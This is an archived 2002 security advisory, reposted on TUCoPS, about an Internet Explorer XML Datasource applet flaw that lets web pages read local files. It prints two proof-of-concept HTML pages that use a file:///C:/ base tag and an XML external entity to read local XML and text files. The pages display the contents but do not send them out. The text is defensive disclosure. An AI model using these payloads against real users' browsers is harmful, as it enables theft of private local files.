TUCoPS :: Browsers :: expl5640.htm

Internet Explorer XML Datasource applet permits to send local files to remote site
19th Aug 2002 [SBWID-5640]
COMMAND

	
		XML Datasource applet permits to send local files to remote site
	
	

SYSTEMS AFFECTED

	
		All releases since IE 4.0
	
	

PROBLEM

	
		

		    .---. .----------

		     / \ __ / ------

		    / / \( )/ -----

		   ////// ' \/ ` ---

		  //// / // : : ---

		 // / / /` '--

		// //..\\                Jelmer [jelmer@kuperus.xs4all.nl] found :

		       ====UU====UU====

		           '//||\\` b 

		

		

		The problem  lies  in  a  legacy  XML  Datasource  applet  shipped  with
		internet explorer since its 4.0 release
		

		it is used in a page like this
		

		<applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"

		MAYSCRIPT="true">

		

		</applet>

		

		as you can see you dont specify a jar or cab file  where  the  class  is
		loaded from, apperently it is added to the classpath from a local  file.
		It gets nasty when you add a <base  href="file:///C:/">  tag  to  the
		head section, the applet now thinks it's codebase is local and  you  are
		allowed to read local xml files So this snippet will read c:\jelmer.xml
		

		<html>

		<head>

		 <base href="file:///C:/">

		</head>

		<body>

		 <applet code="com.ms.xml.dso.XMLDSO.class" width=100% height=50 id="xmldso"

		MAYSCRIPT="true">

		  <PARAM NAME="url" VALUE="jelmer.xml">

		 </applet>

		 <script language="javascript">

		  setTimeout("showIt()",2000);

		  function showIt() {

		   var jelmer = xmldso.getDocument();

		   alert(jelmer.Text);

		  }

		 </script>

		</body>

		</html>

		

		reading local xml files is bad enough but there  is  more  that  can  be
		done xml has a feature called  external  entities  wich  allows  you  to
		combine multiple files as one big file  This  allows  us  to  read  text
		files aswell as shown by the following example :
		

		<html>

		<head>

		 <base href="file:///C:/">

		</head>

		<body>

		 <applet code="com.ms.xml.dso.XMLDSO.class" width="0" height="0" id="xmldso"

		MAYSCRIPT="true">

		  <?xml version="1.0"?>

		  <!DOCTYPE file [

		    <!ELEMENT file (#PCDATA) >

		    <!ENTITY contents SYSTEM "file:///C:/jelmer.txt">

		  ]>

		  <file>

		  &contents;

		  </file>

		 </applet>

		 <script language="javascript">

		  setTimeout("showIt()",2000);

		  function showIt() {

		   var jelmer = xmldso.getDocument();

		   alert(jelmer.Text);

		  }

		 </script>

		</body>

		</html> 

		

		A Demonstration of the issue described is available at :
		

		http://www.xs4all.nl/~jkuperus/msieread.htm

		

		It reads and displays the contents of c:\jelmer.txt
	
	

SOLUTION

	
		 Patch :

		 =======

		

		None yet.
		

		 Workaround :

		 ============

		

		Disable java all together or install  the  sun  jdk  it  does  not  seem

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2026 AOH